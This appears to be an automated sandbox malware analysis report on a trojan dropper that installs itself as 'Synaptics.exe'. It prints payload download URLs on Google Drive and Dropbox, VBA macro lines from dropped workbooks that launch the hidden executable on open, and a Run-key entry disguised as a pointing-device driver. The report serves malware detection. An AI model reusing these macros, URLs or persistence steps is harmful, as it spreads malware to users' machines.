                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifor
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasU
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasu
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasua
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn%e
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.d
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnL
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaly?F
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnd:#f;
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadness
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnl
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoE
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoP
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoW64
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle-
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogles
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolic
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle=
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooglev
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadors=
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouble
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goow
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005418000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1579357686.000000000790E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGI
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ78
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ78sH
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: C:\Users\user\Desktop\._cache_1.exe Code function: 2_2_00517A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00517A60
                              Source: C:\Users\user\Desktop\._cache_1.exe Code function: 2_2_00517C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00517C10

                              System Summary

                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: U1NTS3we.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: U1NTS3we.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 004E8280 appears 47 times
                              Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 004F4C20 appears 145 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816
                              Source: 1.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: 1.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX9CB3.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exe, 00000001.00000003.1317446237.0000000000595000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exe, 00000001.00000000.1304723968.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exe Binary or memory string: OriginalFileName vs 1.exe
                              Source: 1.exe Binary or memory string: OriginalFilenameb! vs 1.exe
                              Source: 1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@7/28@6/3
                              Source: C:\Users\user\Desktop\._cache_1.exe Code function: 2_2_0051D0D0 RtlExpandEnvironmentStrings, CoCreateInstance, SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, VariantInit, VariantClear, SysFreeString, SysFreeString, SysFreeString, SysFreeString
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\Desktop\._cache_1.exe
                              Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\U1NTS3we.xlsm
                              Source: Yara match File source: 1.exe, type: SAMPLE
                              Source: Yara match File source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\1.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\1.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: 1.exe Virustotal: Detection: 84%
                              Source: 1.exe ReversingLabs: Detection: 86%
                              Source: C:\Users\user\Desktop\1.exe File read: C:\Users\user\Desktop\1.exe
                              Source: unknown Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
                              Source: C:\Users\user\Desktop\1.exe Process created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
                              Source: C:\Users\user\Desktop\1.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\1.exe Section loaded: apphelp.dll, version.dll, wininet.dll, wsock32.dll, netapi32.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textshaping.dll, propsys.dll, twext.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, policymanager.dll, msvcp110_win.dll, ntshrui.dll, sspicli.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, srvcli.dll, cscapi.dll, netutils.dll, shacct.dll, idstore.dll, samlib.dll, twinapi.appcore.dll, wlidprov.dll, samcli.dll, provsvc.dll, starttiledata.dll, acppage.dll, sfc.dll, msi.dll, aepic.dll, ntmarta.dll, cryptsp.dll, sfc_os.dll, edputil.dll, urlmon.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: apphelp.dll, msasn1.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: apphelp.dll, version.dll, wininet.dll, wsock32.dll, netapi32.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textshaping.dll, profapi.dll, propsys.dll, ntmarta.dll, iertutil.dll, sspicli.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
                              Source: C:\Users\user\Desktop\1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\svA3fW8.ini
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                              Source: 1.exe Static file information: File size 1101824 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

                              Persistence and Installation Behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe; File created: C:\Users\user\Documents\~$cache1
Source: C:\Users\user\Desktop\1.exe; File created: C:\Users\user\Desktop\._cache_1.exe
Source: C:\Users\user\Desktop\1.exe; File created: C:\ProgramData\Synaptics\RCX9CB3.tmp
Source: C:\Users\user\Desktop\1.exe; File created: C:\ProgramData\Synaptics\Synaptics.exe
Source: C:\Users\user\Desktop\1.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
Source: C:\ProgramData\Synaptics\Synaptics.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\ProgramData\Synaptics\Synaptics.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\1.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7484; Thread sleep time: -900000s >= -30000s
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7284; Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\Synaptics\Synaptics.exe; Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\1.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\._cache_1.exe; Code function: 2_2_00522080 LdrInitializeThunk,2_2_00522080

                              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\1.exe; Process created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
Source: C:\Users\user\Desktop\1.exe; Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Users\user\Desktop\1.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: Amcache.hve.14.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr; Binary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

Source: Yara match; File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match; File source: 1.exe, type: SAMPLE
Source: Yara match; File source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
